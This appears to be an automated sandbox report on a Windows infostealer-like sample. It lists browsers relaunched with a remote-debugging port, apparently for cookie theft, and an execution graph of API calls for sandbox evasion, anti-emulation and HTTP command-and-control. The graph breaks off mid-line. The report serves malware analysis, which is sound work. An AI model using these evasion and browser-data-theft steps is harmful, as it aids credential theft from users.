                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                                                                    Start time:00:57:32
                                                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2868 --field-trial-handle=2812,i,12872953387069903488,11110384550952122137,262144 /prefetch:8
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                                                                    Start time:00:57:46
                                                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                                                    Start time:00:57:46
                                                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2576 --field-trial-handle=2224,i,4927073609183200829,12100842426449448139,262144 /prefetch:3
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                                                                    Start time:00:57:46
                                                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                                                                    Start time:00:57:47
                                                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:3
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                                                                    Start time:00:57:51
                                                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6384 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                                                                                    Start time:00:57:51
                                                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6444 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                                                                    Start time:00:58:47
                                                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6504 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                      Execution Coverage:28.8%
                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                      Signature Coverage:7.7%
                                                                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:26
                                                                                                                                                                                                                                                                                      execution_graph 12419 4185c0 12420 4185c2 12419->12420 12433 418610 GetModuleHandleA 12420->12433 12422 4185c9 12437 401090 15 API calls 12422->12437 12428 4185e7 12452 4011f0 GetPEB 12428->12452 12434 4187e6 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 12433->12434 12436 418628 12433->12436 12435 418840 12434->12435 12435->12422 12436->12434 12792 4108e0 GetProcessHeap HeapAlloc GetComputerNameA 12437->12792 12439 401135 strcmp 12440 401143 12439->12440 12441 401156 12439->12441 12793 4108b0 GetProcessHeap HeapAlloc GetUserNameA 12440->12793 12445 401000 GetCurrentProcess VirtualAllocExNuma 12441->12445 12443 401148 strcmp 12443->12441 12444 401160 ExitProcess 12443->12444 12446 401087 ExitProcess 12445->12446 12447 40102f VirtualAlloc 12445->12447 12448 40104b 12447->12448 12449 401083 12448->12449 12450 401058 memset VirtualFree 12448->12450 12451 401170 GetPEB 12449->12451 12450->12449 12451->12428 12453 401210 12452->12453 12454 401216 lstrcmpiW 12453->12454 12455 401229 GetPEB 12453->12455 12454->12453 12456 401224 12454->12456 12457 401240 12455->12457 12481 417270 12456->12481 12458 401246 lstrcmpiW 12457->12458 12459 401259 GetPEB 12457->12459 12458->12456 12458->12457 12460 401270 12459->12460 12461 401276 lstrcmpiW 12460->12461 12462 401289 GetPEB 12460->12462 12461->12456 12461->12460 12463 4012a0 12462->12463 12464 4012a6 lstrcmpiW 12463->12464 12465 4012b9 GetPEB 12463->12465 12464->12456 12464->12463 12466 4012d0 12465->12466 12467 4012e6 GetPEB 12466->12467 12468 4012d6 lstrcmpiW 12466->12468 12469 401300 12467->12469 12468->12456 12468->12466 12470 401316 12469->12470 12471 401306 lstrcmpiW 12469->12471 12794 4011b0 GetPEB 12470->12794 12471->12456 12471->12469 12474 4011b0 2 API calls 12475 40132e 12474->12475 12475->12456 12476 4011b0 2 API calls 12475->12476 12477 40133c 12476->12477 12477->12456 12478 4011b0 2 API calls 12477->12478 12479 40134a 12478->12479 12479->12456 12480 4011b0 2 API calls 12479->12480 12480->12456 12482 417280 12481->12482 12798 4101c0 12482->12798 12488 4172aa 12489 410340 3 API calls 12488->12489 12490 4172b9 12489->12490 12807 410290 12490->12807 12492 4172c1 12493 4172dd OpenEventA 12492->12493 12494 4172f4 12493->12494 12495 4172eb CloseHandle 12493->12495 12496 417305 CreateEventA 12494->12496 12495->12492 12497 4101c0 lstrcpyA 12496->12497 12498 417321 12497->12498 12811 410240 lstrlenA 12498->12811 12501 410240 2 API calls 12502 417373 12501->12502 12815 4188e0 12502->12815 12506 417546 12507 410290 lstrcpyA 12506->12507 12508 41754e 12507->12508 12509 4101c0 lstrcpyA 12508->12509 12510 417567 12509->12510 12511 410340 3 API calls 12510->12511 12512 41757c 12511->12512 12853 4102e0 12512->12853 12515 410290 lstrcpyA 12516 417591 12515->12516 12517 4175aa CreateDirectoryA 12516->12517 12857 410200 12517->12857 12520 410200 lstrcpyA 12521 4175d2 12520->12521 12522 410200 lstrcpyA 12521->12522 12523 4175de 12522->12523 12524 410200 lstrcpyA 12523->12524 12525 4175f4 12524->12525 12861 416b40 12525->12861 12527 417619 12528 410290 lstrcpyA 12527->12528 12529 417627 12528->12529 12530 410290 lstrcpyA 12529->12530 12531 41763b 12530->12531 12532 410290 lstrcpyA 12531->12532 12533 417658 12532->12533 12534 410290 lstrcpyA 12533->12534 12535 417663 12534->12535 12536 417670 InternetOpenA 12535->12536 12906 410530 12536->12906 12538 417694 InternetOpenA 12539 410200 lstrcpyA 12538->12539 12540 4176c7 12539->12540 12541 4101c0 lstrcpyA 12540->12541 12542 4176d7 12541->12542 12907 410540 GetWindowsDirectoryA 12542->12907 12545 410200 lstrcpyA 12546 4176ec 12545->12546 12924 402aa0 12546->12924 12548 4176f3 13066 4132f0 12548->13066 12550 417700 12551 4101c0 lstrcpyA 12550->12551 12552 41772e 12551->12552 12553 410200 lstrcpyA 12552->12553 12554 417737 12553->12554 12555 410200 lstrcpyA 12554->12555 12556 417743 12555->12556 12557 410200 lstrcpyA 12556->12557 12558 41774f 12557->12558 12559 410200 lstrcpyA 12558->12559 12560 417765 12559->12560 13086 403920 12560->13086 12562 417786 13272 412d50 12562->13272 12564 4177a0 12565 4101c0 lstrcpyA 12564->12565 12566 4177be 12565->12566 12567 410200 lstrcpyA 12566->12567 12568 4177ca 12567->12568 12569 410200 lstrcpyA 12568->12569 12570 4177d6 12569->12570 12571 410200 lstrcpyA 12570->12571 12572 4177e2 12571->12572 12573 410200 lstrcpyA 12572->12573 12574 4177f8 12573->12574 12575 403920 50 API calls 12574->12575 12576 417816 12575->12576 13313 412a90 12576->13313 12578 417830 12579 4101c0 lstrcpyA 12578->12579 12580 41784e 12579->12580 12581 410200 lstrcpyA 12580->12581 12582 41785a 12581->12582 12583 410200 lstrcpyA 12582->12583 12584 417866 12583->12584 12585 410200 lstrcpyA 12584->12585 12586 417872 12585->12586 12587 410200 lstrcpyA 12586->12587 12588 417888 12587->12588 12589 403920 50 API calls 12588->12589 12590 4178a6 12589->12590 13362 412c40 12590->13362 12592 4178c0 12593 410200 lstrcpyA 12592->12593 12594 4178d6 12593->12594 12595 410200 lstrcpyA 12594->12595 12596 4178e2 12595->12596 12597 410200 lstrcpyA 12596->12597 12598 4178ee 12597->12598 12599 410200 lstrcpyA 12598->12599 12600 417904 12599->12600 13370 413510 12600->13370 12602 417920 12603 410200 lstrcpyA 12602->12603 12604 417953 12603->12604 12605 410200 lstrcpyA 12604->12605 12606 41795f 12605->12606 12607 410200 lstrcpyA 12606->12607 12608 41796b 12607->12608 12609 410200 lstrcpyA 12608->12609 12610 417981 12609->12610 13716 40e440 12610->13716 12792->12439 12793->12443 12795 4011d0 12794->12795 12796 4011e0 12795->12796 12797 4011d6 lstrcmpiW 12795->12797 12796->12456 12796->12474 12797->12795 12797->12796 12799 4101ce 12798->12799 12800 4101ea 12799->12800 12801 4101e2 lstrcpyA 12799->12801 12802 410340 lstrlenA 12800->12802 12801->12800 12804 41036e 12802->12804 12803 410390 12806 4108b0 GetProcessHeap HeapAlloc GetUserNameA 12803->12806 12804->12803 12805 410380 lstrcpyA lstrcatA 12804->12805 12805->12803 12806->12488 12808 4102a4 12807->12808 12809 4102ce 12808->12809 12810 4102c6 lstrcpyA 12808->12810 12809->12492 12810->12809 12812 410258 12811->12812 12813 410280 12812->12813 12814 410278 lstrcpyA 12812->12814 12813->12501 12814->12813 12816 418d02 9 API calls 12815->12816 12843 4188ed 12815->12843 12817 418e04 12816->12817 12818 418d9b GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12816->12818 12819 418e11 8 API calls 12817->12819 12820 418ebc 12817->12820 12818->12817 12819->12820 12821 418ec5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12820->12821 12822 418f2e 12820->12822 12821->12822 12823 418f37 6 API calls 12822->12823 12824 418fb6 12822->12824 12823->12824 12825 418fc3 9 API calls 12824->12825 12826 419084 12824->12826 12825->12826 12827 4190f6 12826->12827 12828 41908d GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12826->12828 12829 419126 12827->12829 12830 4190ff GetProcAddress GetProcAddress 12827->12830 12828->12827 12831 419156 12829->12831 12832 41912f GetProcAddress GetProcAddress 12829->12832 12830->12829 12833 419163 10 API calls 12831->12833 12834 41923a 12831->12834 12832->12831 12833->12834 12835 419243 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12834->12835 12836 419296 12834->12836 12835->12836 12837 4192b0 12836->12837 12838 41929f GetProcAddress 12836->12838 12839 4192b9 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12837->12839 12840 41930c 12837->12840 12838->12837 12839->12840 12841 419315 GetProcAddress 12840->12841 12842 417538 12840->12842 12841->12842 12844 4113b0 12842->12844 12843->12816 12845 4101c0 lstrcpyA 12844->12845 12846 4113c7 12845->12846 12847 4101c0 lstrcpyA 12846->12847 12848 4113d3 GetSystemTime 12847->12848 12849 411462 12848->12849 12851 4113f3 12848->12851 12849->12506 12850 41143d lstrlenA 12850->12851 12851->12849 12851->12850 13762 4103a0 12851->13762 12855 41030a 12853->12855 12854 410330 12854->12515 12855->12854 12856 41031e lstrcpyA lstrcatA 12855->12856 12856->12854 12858 410215 12857->12858 12859 410229 12858->12859 12860 410221 lstrcpyA 12858->12860 12859->12520 12860->12859 12862 416b59 12861->12862 12863 410240 2 API calls 12862->12863 12864 416b6f 12863->12864 12865 410240 2 API calls 12864->12865 12888 416b7b 12865->12888 12866 416c63 lstrlenA 12866->12888 12867 4101c0 lstrcpyA 12868 416daa 12867->12868 13808 410500 StrCmpCA 12868->13808 12870 416db5 12875 416dc2 Sleep 12870->12875 12876 416e3c 12870->12876 12871 416c7c strstr 12872 416c8e strstr 12871->12872 12871->12888 12872->12888 12873 4101c0 lstrcpyA 12873->12888 12874 410240 2 API calls 12874->12888 12878 410200 lstrcpyA 12875->12878 12877 410200 lstrcpyA 12876->12877 12879 416e4a 12877->12879 12880 416ddf 12878->12880 12881 410200 lstrcpyA 12879->12881 12882 410200 lstrcpyA 12880->12882 12883 416e58 12881->12883 12884 416dee 12882->12884 12883->12527 12885 410200 lstrcpyA 12884->12885 12886 416dfa 12885->12886 12887 410200 lstrcpyA 12886->12887 12889 416e10 12887->12889 12888->12866 12888->12871 12888->12873 12888->12874 12891 410200 lstrcpyA 12888->12891 12894 410290 lstrcpyA 12888->12894 12896 416d6e 12888->12896 12905 416d94 12888->12905 13767 416910 12888->13767 13778 4169c0 12888->13778 13809 410500 StrCmpCA 12888->13809 12890 416b40 30 API calls 12889->12890 12892 416e32 12890->12892 12891->12888 12892->12883 12894->12888 12897 410240 2 API calls 12896->12897 12898 416d78 12897->12898 12899 410240 2 API calls 12898->12899 12901 416d82 12899->12901 12902 410290 lstrcpyA 12901->12902 12903 416d8b 12902->12903 12904 410290 lstrcpyA 12903->12904 12904->12905 12905->12867 12906->12538 12908 410566 GetVolumeInformationA 12907->12908 12910 4105ba 12908->12910 12911 410607 GetProcessHeap HeapAlloc 12910->12911 12912 410625 wsprintfA lstrcatA 12911->12912 12913 4106d6 12911->12913 13851 410700 GetCurrentHwProfileA 12912->13851 12914 4101c0 lstrcpyA 12913->12914 12916 4106e6 12914->12916 12916->12545 12917 410671 12918 410686 lstrlenA 12917->12918 12919 410695 12918->12919 13867 411e60 malloc strncpy 12919->13867 12921 4106a3 12922 4101c0 lstrcpyA 12921->12922 12923 4106cd 12922->12923 12923->12916 12925 410200 lstrcpyA 12924->12925 12926 402ac9 12925->12926 12927 402790 5 API calls 12926->12927 12928 402ad6 12927->12928 12929 4101c0 lstrcpyA 12928->12929 12930 402ae7 12929->12930 12931 4101c0 lstrcpyA 12930->12931 12932 402af4 12931->12932 12933 4101c0 lstrcpyA 12932->12933 12934 402b01 12933->12934 12935 4101c0 lstrcpyA 12934->12935 12936 402b0e 12935->12936 12937 4101c0 lstrcpyA 12936->12937 12938 402b1b 12937->12938 12939 402b28 InternetOpenA StrCmpCA 12938->12939 12940 403002 InternetCloseHandle 12939->12940 12941 402b57 12939->12941 12946 403017 12940->12946 12942 4113b0 4 API calls 12941->12942 12943 402b65 12942->12943 12944 4102e0 2 API calls 12943->12944 12945 402b75 12944->12945 12948 410290 lstrcpyA 12945->12948 12947 410200 lstrcpyA 12946->12947 12959 40302b 12947->12959 12949 402b7e 12948->12949 12950 410340 3 API calls 12949->12950 12951 402b9c 12950->12951 12952 410290 lstrcpyA 12951->12952 12953 402ba4 12952->12953 12954 410340 3 API calls 12953->12954 12955 402bb8 12954->12955 12956 410290 lstrcpyA 12955->12956 12957 402bc0 12956->12957 12958 4102e0 2 API calls 12957->12958 12960 402bd3 12958->12960 12959->12548 12961 410290 lstrcpyA 12960->12961 12962 402bdb 12961->12962 12963 410340 3 API calls 12962->12963 12964 402bef 12963->12964 12965 410290 lstrcpyA 12964->12965 12966 402bf7 12965->12966 12967 410340 3 API calls 12966->12967 12968 402c0b 12967->12968 12969 410290 lstrcpyA 12968->12969 12970 402c13 12969->12970 12971 410340 3 API calls 12970->12971 12972 402c2d 12971->12972 12973 4102e0 2 API calls 12972->12973 12974 402c3b 12973->12974 12975 410290 lstrcpyA 12974->12975 12976 402c44 12975->12976 12977 402c56 InternetConnectA 12976->12977 12977->12940 12978 402c96 HttpOpenRequestA 12977->12978 12979 402cd5 12978->12979 12980 402ff8 InternetCloseHandle 12978->12980 12981 402ce2 InternetSetOptionA 12979->12981 12982 402cfa 12979->12982 12980->12940 12981->12982 12983 410340 3 API calls 12982->12983 12984 402d0a 12983->12984 12985 410290 lstrcpyA 12984->12985 12986 402d12 12985->12986 12987 4102e0 2 API calls 12986->12987 12988 402d25 12987->12988 12989 410290 lstrcpyA 12988->12989 12990 402d2d 12989->12990 12991 410340 3 API calls 12990->12991 12992 402d41 12991->12992 12993 410290 lstrcpyA 12992->12993 12994 402d49 12993->12994 12995 410340 3 API calls 12994->12995 12996 402d5d 12995->12996 12997 410290 lstrcpyA 12996->12997 12998 402d65 12997->12998 12999 410340 3 API calls 12998->12999 13000 402d79 12999->13000 13001 410290 lstrcpyA 13000->13001 13002 402d81 13001->13002 13003 410340 3 API calls 13002->13003 13004 402d95 13003->13004 13005 410290 lstrcpyA 13004->13005 13006 402d9d 13005->13006 13007 4102e0 2 API calls 13006->13007 13008 402db0 13007->13008 13009 410290 lstrcpyA 13008->13009 13010 402db8 13009->13010 13011 410340 3 API calls 13010->13011 13012 402dcc 13011->13012 13013 410290 lstrcpyA 13012->13013 13014 402dd4 13013->13014 13015 410340 3 API calls 13014->13015 13016 402de8 13015->13016 13017 410290 lstrcpyA 13016->13017 13018 402df0 13017->13018 13019 4102e0 2 API calls 13018->13019 13020 402e00 13019->13020 13021 410290 lstrcpyA 13020->13021 13022 402e08 13021->13022 13023 410340 3 API calls 13022->13023 13024 402e1c 13023->13024 13025 410290 lstrcpyA 13024->13025 13026 402e24 13025->13026 13027 410340 3 API calls 13026->13027 13028 402e38 13027->13028 13029 410290 lstrcpyA 13028->13029 13030 402e40 13029->13030 13031 410340 3 API calls 13030->13031 13032 402e54 13031->13032 13033 410290 lstrcpyA 13032->13033 13034 402e5c 13033->13034 13035 410340 3 API calls 13034->13035 13036 402e70 13035->13036 13037 410290 lstrcpyA 13036->13037 13038 402e78 13037->13038 13039 4102e0 2 API calls 13038->13039 13040 402e8b 13039->13040 13041 410290 lstrcpyA 13040->13041 13042 402e93 13041->13042 13043 4101c0 lstrcpyA 13042->13043 13044 402ea9 13043->13044 13045 4102e0 2 API calls 13044->13045 13046 402eb7 13045->13046 13047 4102e0 2 API calls 13046->13047 13048 402ec3 13047->13048 13049 410290 lstrcpyA 13048->13049 13052 402ecb 13049->13052 13050 402ef8 lstrlenA 13050->13052 13051 402f15 lstrlenA 13051->13052 13052->13050 13052->13051 13053 402f32 Sleep 13052->13053 13054 402f73 InternetReadFile 13052->13054 13055 402f50 13053->13055 13056 402f43 13053->13056 13057 402f90 13054->13057 13058 402fe1 InternetCloseHandle 13054->13058 13059 4101c0 lstrcpyA 13055->13059 13056->13052 13056->13055 13057->13058 13064 402f97 13057->13064 13060 402ff2 13058->13060 13061 402f5d 13059->13061 13060->12980 13061->12959 13062 410340 3 API calls 13062->13064 13063 410290 lstrcpyA 13063->13064 13064->13058 13064->13062 13064->13063 13065 402fc3 InternetReadFile 13064->13065 13065->13058 13065->13064 13872 410530 13066->13872 13068 41330f StrCmpCA 13069 413323 13068->13069 13070 41331b ExitProcess 13068->13070 13071 41332a strtok_s 13069->13071 13072 413345 13071->13072 13073 4134f6 13071->13073 13074 413360 strtok_s 13072->13074 13075 4133a0 StrCmpCA 13072->13075 13076 4134b3 StrCmpCA 13072->13076 13077 413452 StrCmpCA 13072->13077 13078 413475 StrCmpCA 13072->13078 13079 413384 StrCmpCA 13072->13079 13080 413494 StrCmpCA 13072->13080 13081 4133d8 StrCmpCA 13072->13081 13082 4133bc StrCmpCA 13072->13082 13083 41340c StrCmpCA 13072->13083 13084 41342f StrCmpCA 13072->13084 13085 410240 2 API calls 13072->13085 13073->12550 13074->13072 13074->13073 13075->13072 13075->13074 13076->13072 13077->13072 13077->13074 13078->13072 13079->13072 13079->13074 13080->13072 13081->13072 13081->13074 13082->13072 13082->13074 13083->13072 13083->13074 13084->13072 13084->13074 13085->13072 13087 410200 lstrcpyA 13086->13087 13088 403949 13087->13088 13089 402790 5 API calls 13088->13089 13090 403956 13089->13090 13091 4101c0 lstrcpyA 13090->13091 13092 403965 13091->13092 13093 4101c0 lstrcpyA 13092->13093 13094 403972 13093->13094 13095 4101c0 lstrcpyA 13094->13095 13096 40397f 13095->13096 13097 4101c0 lstrcpyA 13096->13097 13098 40398c 13097->13098 13099 4101c0 lstrcpyA 13098->13099 13100 403999 13099->13100 13101 4039a7 InternetOpenA StrCmpCA 13100->13101 13102 404010 InternetCloseHandle 13101->13102 13103 4039d6 13101->13103 13105 404021 13102->13105 13104 4113b0 4 API calls 13103->13104 13106 4039e4 13104->13106 13875 407790 lstrlenA 13105->13875 13107 4102e0 2 API calls 13106->13107 13109 4039f9 13107->13109 13111 410290 lstrcpyA 13109->13111 13116 403a01 13111->13116 13112 410240 2 API calls 13113 404042 13112->13113 13115 410340 3 API calls 13113->13115 13114 404081 13118 410200 lstrcpyA 13114->13118 13117 404055 13115->13117 13120 410340 3 API calls 13116->13120 13119 410290 lstrcpyA 13117->13119 13134 403f5d 13118->13134 13121 40405d 13119->13121 13122 403a23 13120->13122 13124 404064 GetProcessHeap HeapFree 13121->13124 13123 410290 lstrcpyA 13122->13123 13125 403a2b 13123->13125 13124->13114 13126 410340 3 API calls 13125->13126 13127 403a3f 13126->13127 13128 410290 lstrcpyA 13127->13128 13129 403a47 13128->13129 13130 4102e0 2 API calls 13129->13130 13131 403a57 13130->13131 13132 410290 lstrcpyA 13131->13132 13133 403a5f 13132->13133 13135 410340 3 API calls 13133->13135 13134->12562 13136 403a73 13135->13136 13137 410290 lstrcpyA 13136->13137 13138 403a7b 13137->13138 13139 410340 3 API calls 13138->13139 13140 403a8f 13139->13140 13141 410290 lstrcpyA 13140->13141 13142 403a97 13141->13142 13143 410340 3 API calls 13142->13143 13144 403ab1 13143->13144 13145 4102e0 2 API calls 13144->13145 13146 403abd 13145->13146 13147 410290 lstrcpyA 13146->13147 13148 403ac8 13147->13148 13149 403ad9 InternetConnectA 13148->13149 13149->13102 13150 403b19 HttpOpenRequestA 13149->13150 13151 404006 InternetCloseHandle 13150->13151 13152 403b5c 13150->13152 13151->13102 13153 403b63 InternetSetOptionA 13152->13153 13154 403b7b 13152->13154 13153->13154 13155 410340 3 API calls 13154->13155 13156 403b91 13155->13156 13157 410290 lstrcpyA 13156->13157 13158 403b99 13157->13158 13159 4102e0 2 API calls 13158->13159 13160 403bac 13159->13160 13161 410290 lstrcpyA 13160->13161 13162 403bb4 13161->13162 13163 410340 3 API calls 13162->13163 13164 403bc8 13163->13164 13165 410290 lstrcpyA 13164->13165 13166 403bd0 13165->13166 13167 410340 